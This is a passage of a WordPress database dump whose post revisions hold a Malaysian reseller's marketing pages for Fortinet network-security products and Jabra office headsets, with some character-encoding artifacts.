<li>\n<h5><strong>High performance</strong></h5>\n</li>\n</ul>\nInnovative security processor (SPU) technology for high-performance network throughput and deep security inspection.\n<ul>\n 	<li>\n<h5><strong>Advanced threat protection</strong></h5>\n</li>\n</ul>\nSeamless integration â€“ appliance or cloud service â€“ with world-class sandboxing for advanced threats.\n<ul>\n 	<li>\n<h5><strong>Security Fabric integration</strong></h5>\n</li>\n</ul>\nIntegration and automation with Fortinetâ€™s broad product portfolio and partner ecosystem.\n<ul>\n 	<li>\n<h5><strong>Data leak protection</strong></h5>\n</li>\n</ul>\nFile protection controls to prevent sensitive data exfiltration.\n\n&nbsp;\n<h4>4.Â <strong>Crypto VPNs</strong></h4>\nMaintaining uniform security policy for all corporate users, applications, devices irrespective of their location and appropriate access control is essential to providing security in a multi-cloud environment. The data in motion must be protected using mutual authentication and confidentiality to protect sensitive corporate data over unprotected networks and provides a defensible proof of security.\n<h3><strong>Features and Benefits</strong></h3>\n<ul>\n 	<li>\n<h5><strong>Hardware assisted encryption</strong></h5>\n</li>\n</ul>\nPrevent breaches and secure data in transit at a very high speed.\n<ul>\n 	<li>\n<h5><strong>Scalable Security</strong></h5>\n</li>\n</ul>\nScalable security that is seamlessly integrated with routing.\n<ul>\n 	<li>\n<h5><strong>Comprehensive data communications security</strong></h5>\n</li>\n</ul>\nProtects Application to Application, User to Users, User to Machine, Machine to Machine communication.\n<ul>\n 	<li>\n<h5><strong>Diverse VPNs</strong></h5>\n</li>\n</ul>\nIPsec or SSL based diverse VPNs to offer flexible secure network choices.\n<ul>\n 	<li>\n<h5><strong>Security Fabric Integration</strong></h5>\n</li>\n</ul>\nShare FortiTelemetry information across site-to-site tunnels with required confidentiality.\n<ul>\n 	<li>\n<h5><strong>Unified Management</strong></h5>\n</li>\n</ul>\nSimplified, easy-to-manage, single pane of glass to manage large scale crypto VPNs, Routing and NGFW.\n\n&nbsp;\n<h4>5.Â <strong>Secure Web Gateway (SWG)</strong></h4>\nFortinet firewalls with Gateway Security protects enterprises against web attacks with URL filtering, visibility and control of encrypted web traffic via SSL inspection, and application of granular web application policies. Fortinet is the first and only gateway security vendor to earn Virus Bulletinâ€™s VBWeb certification for web filtering effectiveness.\n<h3><strong>Features and Benefits</strong></h3>\n<ul>\n 	<li>Feature-rich product that consolidates NGFW and SWG services.</li>\n 	<li>Powerful hardware that can perform SSL deep inspection.</li>\n 	<li>Anti-malware techniques updated with the latest threat intelligence.</li>\n 	<li>Reduce security teamâ€™s workload by providing a single pane of glass management for both NGFW and SWG.</li>\n 	<li>Effectively remove blind spots in encrypted traffic, without compromising on performance.</li>\n 	<li>Stay protected against the latest known and unknown internet-borne attacks.</li>\n</ul>\n&nbsp;\n<h4><strong>6.Â Management &amp; Reporting</strong></h4>\nSecurity teams globally are challenged by resource constraints, both in terms of the number of staff and raw security talent. Moreover, security teams are asked to do more, often in more complex networks and with growing numbers of alerts from multiple systems. Successful security teams allay these challenges by implementing three best practices. First, they simplify the way view management, combining operation NOC-style views with security-based SOC context. Second, they regularly measure and score their security effectiveness, enabling them anytime to answer how secure they are. Third, they demand deep integration so they can automate repetitive actions, especially across silos when possible.\n<h3><strong>Features and Benefits</strong></h3>\n<ul>\n 	<li>\n<h5><strong>Security Operationalized Visibility</strong></h5>\n</li>\n</ul>\nBig picture perspective allows you to see the forest through the tree.\n<ul>\n 	<li>\n<h5><strong>Cross Silo Automation</strong></h5>\n</li>\n</ul>\nDeeper than mere integration, orchestrate workflow responses to triggered security events.\n<ul>\n 	<li>\n<h5><strong>Simplified Management</strong></h5>\n</li>\n</ul>\nStreamline deployment and management, reducing task time and improving response time.\n<ul>\n 	<li>\n<h5><strong>Rapid Detection</strong></h5>\n</li>\n</ul>\nConsolidate telemetry and alerts to uncover patterns and discover security insights.\n<ul>\n 	<li>\n<h5><strong>Fortinet Fabric</strong></h5>\n</li>\n</ul>\nCentralized control over all of your Fortinet network assets.\n\n&nbsp;\n<h2>INFRASTRUCTURE PROTECTION</h2>\n<h4><strong>1. Endpoint Protection</strong></h4>\nEndpoints are frequently the target of initial compromise or attacks. FortiClient strengthens endpoint security through integrated visibility, control, and proactive defense. With the ability to discover, monitor, and assess endpoint risks, you can ensure endpoint compliance, mitigate risks, and reduce exposure. FortiClient proactively defends against advanced attacks. Its tight integration with the Security Fabric enables policy-based automation to contain threats and control outbreaks. FortiClient is compatible with Fabric-Ready partners to further strengthen enterprisesâ€™ security posture.\n<h3><strong>Features and Benefits</strong></h3>\n<ul>\n 	<li>\n<h5><strong>Broad endpoint visibility</strong></h5>\n</li>\n</ul>\nFortiClient Fabric Agent integrates endpoints into the Security Fabric and provides endpoint telemetry, including user identity, protection status, risk scores, unpatched vulnerabilities, security events, and more.\n<ul>\n 	<li>\n<h5><strong>Proactive endpoint defense</strong></h5>\n</li>\n</ul>\nAnti-exploit, sandbox integration, and behavior and pattern-based malware detection proactively detect and block malware, malicious scripts, document-based, and other advanced attacks.\n<ul>\n 	<li>\n<h5><strong>Automated threat containment</strong></h5>\n</li>\n</ul>\nIntegration with the Security Fabric enables automated response. Mitigate unpatched vulnerabilities, alert users, and quarantine risky or compromised endpoints to stem an outbreak.\n<ul>\n 	<li>\n<h5><strong>Secure remote access</strong></h5>\n</li>\n</ul>\nReliable, simple, and secure remote access with built-in, always-on VPN, with the added security of two-factor authentication, plus single-sign-on capabilities.\n<ul>\n 	<li>\n<h5><strong>Easy to deploy and manage</strong></h5>\n</li>\n</ul>\nEasy to deploy and manage Modular and light-weight endpoint agents are centrally managed with the Enterprise Manager Server (EMS). Fabric Agent is compatible with Fabric-Ready endpoint security solutions.\n\n&nbsp;\n<h4>2.Â <strong>Wireless</strong></h4>\nFortinet provides a full suite of Wi-Fi Access Point and WLAN Controller products as part of our Secure Access solution designed to address the unique requirements of every organization. For assistance choosing an AP, our AP Product selector can be found here. Configuration and control of your wireless environment can be done directly with a FortiGate or via our dedicated Wireless LAN controllers. Fortinet also offers FortiManager and FortiCloud as management solutions for the entire Fortinet security fabric. All Fortinetâ€™s wireless solutions integrate with our location analytics platform: FortiPresence. This enables real-time locationing and device tracking.\n<h3><strong>Features and Benefits</strong></h3>\n<ul>\n 	<li>\n<h5><strong>Security Fabric Integration</strong></h5>\n</li>\n</ul>\nIntegration with FortiGate firewalls extends your security fabric out to the edge of the network.\n<ul>\n 	<li>\n<h5><strong>Superior density, scalability and mobilit</strong><strong>y</strong></h5>\n</li>\n</ul>\nHandle even the most complex RF environments.\n<ul>\n 	<li>\n<h5><strong>Zero-touch deployment</strong></h5>\n</li>\n</ul>\nFast and simple deployment with no requirements for onsite tech support.\n<ul>\n 	<li>\n<h5><strong>Simplified deployment and capacity expansion</strong></h5>\n</li>\n</ul>\nNo licenses to manage, just plug and go.\n<ul>\n 	<li>\n<h5><strong>Free location and analytics</strong></h5>\n</li>\n</ul>\nWireless device locationing tools included with no additional licenses required.\n<ul>\n 	<li>\n<h5><strong>Scalability from 1 to 10,000 APs</strong></h5>\n</li>\n</ul>\nA range of platforms for any sized deployment.\n\n&nbsp;\n<h4>3.Â <strong>Switching</strong></h4>\nLegacy Ethernet LANs face many challenges including exponential growth in devices and applications, increased throughput demands from wireless LANs, and complex security implementations. Rather than asking how to secure traditional Ethernet LANs, Fortinet takes a security centric approach offering Ethernet as an extension of the security infrastructure through FortiSwitch and FortiLink. FortiSwitch offers a broad portfolio of secure, simple, and scalable Ethernet switches for applications that range from desktop to data center.\n<h3><strong>Features and Benefits</strong></h3>\n<ul>\n 	<li>\n<h5><strong>Security Fabric Integration with FortiLink</strong></h5>\n</li>\n</ul>\nFortiGate management of FortiSwitch extends Security Fabric features to the Ethernet access layer.\n<ul>\n 	<li>\n<h5><strong>No Touch Provisioning and Management with FortiLink</strong></h5>\n</li>\n</ul>\nAuto discovery, Global VLAN and Security Policies, Firewall interfaces and Ethernet ports equally secure.\n<ul>\n 	<li>\n<h5><strong>Highly Scalable</strong></h5>\n</li>\n</ul>\nBroad portfolio of stackable 1, 10, and 40 GE access ports with up to 100 GE uplinks to scale from desktop to datacenter.\n<ul>\n 	<li>\n<h5><strong>Unparalleled Visibility</strong></h5>\n</li>\n</ul>\nSingle pane of glass management of both Security and Network Access, Device detection and port visibility.\n<ul>\n 	<li>\n<h5><strong>Enable voice, data, and wireless traffic across a single network</strong></h5>\n</li>\n</ul>\nPower network and IoT devices with POE, Auto provision using LLDP-MED.\n<ul>\n 	<li>\n<h5><strong>Virtual Stacking</strong></h5>\n</li>\n</ul>\nFortiLink enables stacking across IDFs when managed, up to 300 switches based on FortiGate model.\n\n&nbsp;\n<h4>4.Â <strong>Email Security</strong></h4>\nEmail security remains a key productivity tool for today\'s organizations, as well as a successful attack vector for cyber criminals. FortiMail Email security utilizes the latest technologies and security services from FortiGuard Labs to deliver consistently top-rated protection from common and advanced threats while integrating robust data protection capabilities to avoid data loss.\n<h3><strong>Features and Benefits</strong></h3>\n<ul>\n 	<li>\n<h5><strong>Top-rated Antispam and Antiphishing</strong></h5>\n</li>\n</ul>\nMaintain productivity by shielding end users from unwanted spam and malicious phishing attacks.\n<ul>\n 	<li>\n<h5><strong>Independently certified advanced threat defense</strong></h5>\n</li>\n</ul>\nThwart cyber criminals intent on stealing data, holding systems for ransomware, conducting fraud, and other malicious purposes.\n<ul>\n 	<li>\n<h5><strong>Integrated data protection</strong></h5>\n</li>\n</ul>\nMaintain the privacy of personal information and confidentiality of sensitive data in compliance with regulatory and corporate guidelines.\n<ul>\n 	<li>\n<h5><strong>High-performance mail handling</strong></h5>\n</li>\n</ul>\nSpeed the delivery of legitimate email at an affordable cost.\n<ul>\n 	<li>\n<h5><strong>Enterprise-class management</strong></h5>\n</li>\n</ul>\nFree staff and end users to drive the business by reducing time spent on email administration.\n\n&nbsp;\n<h2>APPLICATION SECURITY</h2>\n<h4><strong>1. Web Application Firewall (WAF)</strong></h4>\nUnprotected web applications are the easiest point of entry for hackers and vulnerable to a number of attack types. FortiWebâ€™s AI-enhanced and multi-layered approach protects your web apps from the OWASP Top 10 and more. When combined with our Web Application Security Service from FortiGuard Labs youâ€™re protected from the latest application vulnerabilities, bots, and suspicious URLs, and with dual machine learning detection engines your applications are safe from sophisticated threats such as SQL injection, cross-site scripting, buffer overflows, cookie poisoning, malicious sources, and DoS attacks.\n<h3><strong>Features and Benefits</strong></h3>\n<ul>\n 	<li>\n<h5><strong>Proven Web Application Protection</strong></h5>\n</li>\n</ul>\nFortiWeb protects against all the OWASP Top-10 threats, DDoS attacks and many others to defend your mission critical web-based applications.\n<ul>\n 	<li>\n<h5><strong>AI-based Threat Detection</strong></h5>\n</li>\n</ul>\nIn addition to regular signature updates and many other layers of defenses, FortiWebâ€™s AI-based, dual-layer machine learning engines protect against zero-day attacks.\n<ul>\n 	<li>\n<h5><strong>Security Fabric Integration</strong></h5>\n</li>\n</ul>\nIntegration with FortiGate firewalls and FortiSandbox deliver protection from advanced persistent threats.\n<ul>\n 	<li>\n<h5><strong>Hardware-based Acceleration</strong></h5>\n</li>\n</ul>\nFortiWeb delivers industry-leading protected WAF throughputs and blazing fast secure traffic encryption/decryption.\n<ul>\n 	<li>\n<h5><strong>False Positive Mitigation Tools</strong></h5>\n</li>\n</ul>\nAdvanced tools that minimize the day-to-day management of policies and exception lists to ensure only unwanted traffic is blocked.\n<ul>\n 	<li>\n<h5><strong>Advanced Visual Analytics</strong></h5>\n</li>\n</ul>\nFortiWebâ€™s visual reporting tools provide detailed analyses of attack sources, types and other elements that provide insights not available with other WAF solutions.\n\n&nbsp;\n<h4>2.Â <strong>Application Delivery Controller</strong></h4>\nWith bandwidth demand growing faster than budgets and cyber-attacks constantly on the rise, it can be challenging to securely and efficiently deliver applications at the speed your users expect. Fortinet Application Delivery Controller (ADC) appliances optimize the availability, user experience, and scalability of enterprise application delivery. They enable fast, secure, and intelligent acceleration and distribution of even the most demanding enterprise applications.\n<h3><strong>Features and Benefits</strong></h3>\n<ul>\n 	<li>\n<h5><strong>Secure Traffic Management</strong></h5>\n</li>\n</ul>\nSSL offloading, forward proxy and visibility increase responsiveness and assist in scanning for threats.\n<ul>\n 	<li>\n<h5><strong>Application Optimization</strong></h5>\n</li>\n</ul>\nSpeed web application delivery with compression, caching, HTTP 2.0, and HTTP Page Speed-UP.\n<ul>\n 	<li>\n<h5><strong>Security Fabric Integration</strong></h5>\n</li>\n</ul>\nAV and Sandbox integration scans attachments to protect from the latest threats.\n<ul>\n 	<li>\n<h5><strong>Global Server Load Balancing</strong></h5>\n</li>\n</ul>\nDistributes traffic across multiple geographical locations for disaster recovery.\n<ul>\n 	<li>\n<h5><strong>Security Features</strong></h5>\n</li>\n</ul>\nWeb Application Firewall, Web Filtering, and IP Reputation for enhanced security.\n\n&nbsp;\n<h4>3.Â <strong>DDoS</strong></h4>\nDistributed Denial of Service (DDoS) attacks are ever-evolving and use a variety of technologies. To successfully combat these attacks, you need a dynamic, multi-layered security solution. FortiDDoS protects from both known and zero day attacks with very low latency. Itâ€™s easy to deploy and manage, and includes comprehensive reporting and analysis tools.\n<h3><strong>Features and Benefits</strong></h3>\n<ul>\n 	<li>100% security processor (SPU)-based layer 3, 4, and 7 DDoS protection application-aware traffic management.</li>\n 	<li>Ability to monitor hundreds of thousands of parameters simultaneously.</li>\n 	<li>Behavior-based DDoS protection to eliminate need for signature files.</li>\n 	<li>Minimal false-positive detections through continuous threat evaluation.</li>\n 	<li>Attack protection for DNS services via specialized tools.</li>\n 	<li>Defense against every DDoS attack: bulk volumetric, layer 7 application, and SSL/HTTPS.</li>\n</ul>\n&nbsp;\n<h2>THREAT DETECTION &amp; PREVENTION</h2>\n<h4><strong>1. Sandbox</strong></h4>\nWith the increasing volume and sophistication of cyber-attacks, it takes only one threat to slip through security for a data breach to occur. CISOs have adopted sandboxing as an essential component of their security strategies to help combat previously unknown threats. While attack surfaces are becoming more dynamic due to the rise of IoT and cloud-based services, a continuing shortage of cyber security talent is driving organizations to integrate sandboxing with greater controls and a high degree of automation.\n<h5><strong>Features and Benefits</strong></h5>\n<ul>\n 	<li><strong>Broad integration</strong></li>\n</ul>\nExtends advanced threat protection to your next-generation firewall, web application firewall, secure email gateway, and endpoint protection platform.\n<ul>\n 	<li><strong>Intelligent automation</strong></li>\n</ul>\nSpeeds mitigation by sharing real-time updates to disrupt threats at the origin and subsequent immunization across the entire organization and the global community.\n<ul>\n 	<li><strong>All-in-one</strong></li>\n</ul>\nSimplifies deployment and reduces complexity by covering all protocols in a single common sandbox platform.\n<ul>\n 	<li><strong>Flexible deployment</strong></li>\n</ul>\nAvailable as a physical or virtual appliance on premises, as well as a cloud-based or managed service.\n<ul>\n 	<li><strong>Open extensibility</strong></li>\n</ul>\nFlexible APIs for easy third-party integration and available day-zero integration with Fabric-Ready partners.\n\n<h4><strong>2.Â FortiSIEM</strong>\n\nSecurity management only gets more complex. Endpoints, IoT, Infrastructure, Security Tools, Applications, VMâ€™s and Cloud â€“ the number of things you need to secure and monitor grows constantly. FortiSIEM â€“ Fortinetâ€™s Multivendor Security Incident and Events Management solution brings it all together. Visibility, Correlation, Automated Response and Remediation in a single, scalable solution. Using a Business Services view, the complexity of managing network and security operations is reduced, freeing resources, improving breach detection. Worldwide 80% of breaches go undetected because of skills shortage and event information â€˜noiseâ€™. FortiSIEM provides the cross correlation, applies machine learning and UEBA to improve response, to stop breaches before they occur.\n<h5><strong>Features and Benefits</strong></h5>\n<ul>\n 	<li>\n<h5><strong>Asset Self-Discovery</strong></h5>\n</li>\n</ul>\nVisibility needs to be both comprehensive and granular â€“ understanding a devices contextual capabilities and vulnerabilities reduces false positives.\n<ul>\n 	<li>\n<h5><strong>Rapid Integrations and Scalability</strong></h5>\n</li>\n</ul>\nNetwork aware and security tool agnostic operations and management get a real-time business view of availability, utilization and security posture.\n<ul>\n 	<li>\n<h5><strong>Automated Workflow</strong></h5>\n</li>\n</ul>\nA leading SOAR (Security Orchestration and Automated Response engine) the FortiSIEM Remediation Library responds to threats with the security tools you have today, and will grow with your enterprise.\n<ul>\n 	<li>\n<h5><strong>Unified Platform</strong></h5>\n</li>\n</ul>\nMulti-tenancy for role-based access to a unified platform. Of benefit to MSPâ€™s and Enterprise customers alike â€“ deliver services and reports to a customer or a report. Share actionable intelligence and deliver value without compromise.\n\n&nbsp;\n<h4>3.Â <strong>User and Entity Behavior Analytics (UEBA)</strong></h4>\nFortinet User and Entity Behavior Analytics (UEBA) technology protects organizations from insider threats by continuously monitoring users and endpoints with automated detection and response capabilities. Leveraging machine learning and advanced analytics, Fortinet UEBA automatically identifies non-compliant, suspicious, or anomalous behavior and rapidly alerts any compromised user accounts. This proactive approach to threat detection delivers an additional layer of protection and visibility, whether users are on or off the corporate network.\n<h3><strong>Features and Benefits</strong></h3>\n<ul>\n 	<li>\n<h5><strong>Augmented Intelligence (AI)</strong></h5>\n</li>\n</ul>\nEnhanced data visibility with machine learning and UEBA to identify threats.\n<ul>\n 	<li>\n<h5><strong>Rapid Threat Detection</strong></h5>\n</li>\n</ul>\nAI optimizes each stage of the threat investigation pipeline, shining a light on the unknown.\n<ul>\n 	<li>\n<h5><strong>Regulatory Compliance Support</strong></h5>\n</li>\n</ul>\nSupport regulatory compliance with a dedicated reporting tool, to respond to and manage potential non-compliant activity.\n<ul>\n 	<li>\n<h5><strong>Data Security</strong></h5>\n</li>\n</ul>\nMonitor data movement and endpoint activity 24/7 regardless of location or device, whether users are on or off your network.\n<ul>\n 	<li>\n<h5><strong>Forensic-level Reporting</strong></h5>\n</li>\n</ul>\nCompile a full forensic history of user behavior, enabling thorough forensics investigation and detailed reporting.\n<ul>\n 	<li>\n<h5><strong>Valuable Insights</strong></h5>\n</li>\n</ul>\nAnalyze data and deliver valuable insights, allowing your team to contain insider threats and respond in real time.\n\n&nbsp;\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','Fortinet','','inherit','closed','closed','','1474-autosave-v1','','','2019-09-30 14:25:39','2019-09-30 06:25:39','',1474,'https://bintara.com.my/blog/2018/12/17/1474-autosave-v1/',0,'revision','',0),(2225,1,'2018-12-16 22:50:39','2018-12-16 14:50:39','<h2>Jabra. Sound thatâ€™s engineered for you</h2>\r\nWe engineer true wireless earbuds offering you total freedom; noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those youâ€™re speaking to hear you with crystal-clear clarity; and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.\r\n\r\nWith Jabra, you know that you are getting the best products on the market. They are engineered to be so.\r\n<h2>OFFICE HEADSETS</h2>\r\nFor PCs, Mobiles and Telephones.\r\n\r\nOur headphones and headsets are the perfect sound solutions for the office, the commute, the gym, or being out in the elements â€“ whatever you need, wherever you need it, we have world-class products to meet your demands.\r\n<h2>Our Recommended Office Headsets</h2>\r\n<ol>\r\n 	<li><strong>Jabra Evolve 80Â Â <img class=\"\" src=\"https://www.jabra.com/-/media/Images/Products/Jabra-Evolve-80/v3-Refresh/Evolve_80_1.png\" width=\"163\" height=\"185\" /></strong></li>\r\n</ol>\r\nThe best headset for concentration in the open office.\r\n<ul>\r\n 	<li>Boost your concentration</li>\r\n</ul>\r\n<h3 class=\"f-headline\"><i class=\"f-icon icon icon__active-noise-cancelation\"></i>Active noise cancellation</h3>\r\nEliminate unwanted low-frequency background noise at the touch of a button. This lets you stay focused even in noisy office environments.\r\n<h3 class=\"f-headline\"><i class=\"f-icon icon icon__all-day-comfort\"></i>Passive Noise Cancellation</h3>\r\nSimply wear the headset to eliminate high-frequency noise, such as human voices - all thanks to the specially designed ear cushions. We call this â€œpassive noise cancellation.â€\r\n<ul>\r\n 	<li>Shut out office noise and increase your productivityYou can switch on active noise cancellation to virtually eliminate low-frequency sounds, like the hum of air conditioning. Active noise cancellation uses advanced microphones to monitor and counter ambient noise</li>\r\n 	<li>Busy lightThe special â€œbusy lightâ€ turns red to let people know when youâ€™re on the phone. You can also turn it on manually when you donâ€™t want to be disturbed.</li>\r\n 	<li>Works with All Mobile Devices\r\nWorks straight out of the box with all leading UC systems and the the 3.5mm jack lets you connect to a PC, smartphone, tablet, or any other personal device.</li>\r\n 	<li>Intelligent Call Transfer\r\nIs your meeting running over? Easily transfer your Skype for Business call before you leave the office. Disconnect the 3.5mm jack and plug it into the smartphone. Your call will be instantly transferred.</li>\r\n</ul>\r\n2.Â <strong>Jabra Evolve 75Â Â <img class=\"\" src=\"https://www.jabra.com/-/media/Images/Products/Jabra-Evolve-75/V1/Slider/EV75_2.png\" width=\"123\" height=\"141\" /></strong>\r\n\r\nThe best wireless headset for concentration in the open office.\r\n<ul>\r\n 	<li>Outstanding sound for calls and music\r\nWorld-class speakers and HD voice for crystal-clear calls and music</li>\r\n 	<li>Shut out office noise and increase your productivity\r\nYou can switch on active noise cancellation to virtually eliminate low-frequency sounds, like the hum of air conditioning. Active noise cancellation uses advanced microphones to monitor and counter ambient noise</li>\r\n 	<li>Reduce noise and interruptions\r\nSuperior ANC and integrated busylight acts as a â€˜do not disturbâ€™ sign to enhance productivity</li>\r\n</ul>\r\n3.Â <strong>Jabra Evolve 65tÂ Â <img class=\"\" src=\"https://www.jabra.com/-/media/Images/Products/Jabra-Evolve-65t/V4/TopBanner/Slider/1.png\" width=\"169\" height=\"193\" /></strong>\r\n\r\nEngineered to be the worldâ€™s first UC-certified true wireless earbuds.\r\n<ul>\r\n 	<li>Professional-grade sound. True wireless earbuds.\r\nSuperior true wireless call quality with 4-microphone technology. Skype for Business and UC-certified for professional sound on the go, 100% free of wires.</li>\r\n 	<li>Blocks out disruptive background noise\r\nMultiple fitting options provide a snug in-ear fit that seals out sound, giving Passive Noise Cancellation to help you focus</li>\r\n 	<li>All-day power. Always connected.\r\nUp to 5 hours battery on a single charge, 15 hours with the included pocket-friendly charging case. Simultaneously connects to two devices at the same time.</li>\r\n</ul>\r\n4.Â <strong>Jabra Pro 9400 Duo &amp; MonoÂ Â <img class=\"\" src=\"https://assets.jabra.com/e/d/4/b/ed4b6f1a58e2a92d97feb85f65698349acb8e4ee_PI_Jabra_Pro_9450_Duo_Flex_Headband_in_Base_CMYK_Jabra_Pro_9450_Duo_0001_PI_Jabra_PRO_9450_Duo_.png?w=487&amp;h=525\" width=\"146\" height=\"157\" /></strong>\r\n\r\nA wireless headset that enables employees to take calls from their mobile, desk and softphone all with one headset.\r\n<ul>\r\n 	<li>True wireless freedom\r\nWireless DECT technology lets you roam up to 150 meters/450 feet away from your desk without dropping the call. Answer and end calls remotely while multitasking around the office. With up to 10 hours of battery life, you wonâ€™t need to worry about running out of charge.</li>\r\n 	<li>DECT security compliant\r\nCompliant with the latest security requirements of the DECT standard, designed to safeguard against eavesdropping. The Jabra-patented headset-to-base pairing process avoids risky pairing over the air to protect your conversations.</li>\r\n 	<li>Outstanding sound quality\r\nIf you talk and listen for a living, clear conversations can make or break a deal. Get best-in-class noise cancellation and acoustic protection. Your calls will sound great - even in the noisiest of offices</li>\r\n</ul>\r\n5.Â <strong>Jabra Evolve 75eÂ Â <img class=\"\" src=\"https://www.jabra.com/-/media/Images/Products/Jabra-Evolve-75e/V1/Slider/01_Jabra_Evolve_75e_top.png\" alt=\"Jabra Evolve 75e\" width=\"152\" height=\"173\" /></strong>\r\n\r\nEngineered to be the worldâ€™s first professional UC-certified wireless earbuds.\r\n<ul>\r\n 	<li>Skype for Business and Jabber certified wireless earbuds</li>\r\n 	<li>ANC and integrated busylight</li>\r\n 	<li>Fully charged in just 2 hours &amp; up to 14 hours of battery</li>\r\n</ul>\r\nTo discover more about office headset, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','Jabra','','inherit','closed','closed','','1532-revision-v1','','','2018-12-16 22:50:39','2018-12-16 14:50:39','',1532,'https://bintara.com.my/blog/2018/12/16/1532-revision-v1/',0,'revision','',0);
INSERT INTO `wpdp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES (2860,1,'2019-02-07 16:34:20','2019-02-07 08:34:20','<h2>Jabra.</h2><h3>Sound thatâ€™s engineered for you</h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those youâ€™re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.</p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.</p><h2>Jabra Evolve Series</h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office</h3>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve-150x150.jpg 150w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve.jpg 585w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>Better concentration, greater productivity</h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.</p><ul><li>World-class speakers to deliver amazing sound for calls and music.</li><li>Call-management features allow for incredible ease-of-use..</li><li>Compatible with all leading UC platforms.</li></ul><h3>Jabra Evolve 65t</h3><p>The Jabra Evolve 65t are the worldâ€™s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGelsâ„¢ for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.</p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/JabraEvolve65t_ProductImage.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_80.png\" alt=\"\" />											\n		<h3>Jabra Evolve 80</h3><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><h3>Jabra Evolve 75e</h3><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation â€“ but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.</p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Evolve75e.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\" alt=\"\" />											\n		<h3>Jabra Evolve 75</h3><p>Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise â€“ and need mobility around the workspace. Move up to 100ft/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><h3>Jabra Evolve 65 Stereo / Mono</h3><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_65.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\" alt=\"\" />											\n		<h3>Jabra Evolve 40 Stereo / Mono</h3><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><h3>Jabra Evolve 30 Stereo / Mono</h3><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.</p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_30_.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20.png\" alt=\"\" />											\n		<p>Jabra Evolve 20 Stereo / Mono<br />Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.</p>','Jabra','','inherit','closed','closed','','1532-revision-v1','','','2019-02-07 16:34:20','2019-02-07 08:34:20','',1532,'https://bintara.com.my/blog/2019/02/07/1532-revision-v1/',0,'revision','',0),(2458,1,'2018-12-18 21:22:32','2018-12-18 13:22:32','<h2>Jabra. Sound thatâ€™s engineered for you</h2>\r\nWe engineer true wireless earbuds offering you total freedom; noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those youâ€™re speaking to hear you with crystal-clear clarity; and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.\r\n\r\nWith Jabra, you know that you are getting the best products on the market. They are engineered to be so.\r\n<h2>OFFICE HEADSETS</h2>\r\nFor PCs, Mobiles and Telephones.\r\n\r\nOur headphones and headsets are the perfect sound solutions for the office, the commute, the gym, or being out in the elements â€“ whatever you need, wherever you need it, we have world-class products to meet your demands.\r\n<h3>Our Recommended Office Headsets</h3>\r\n<ol>\r\n 	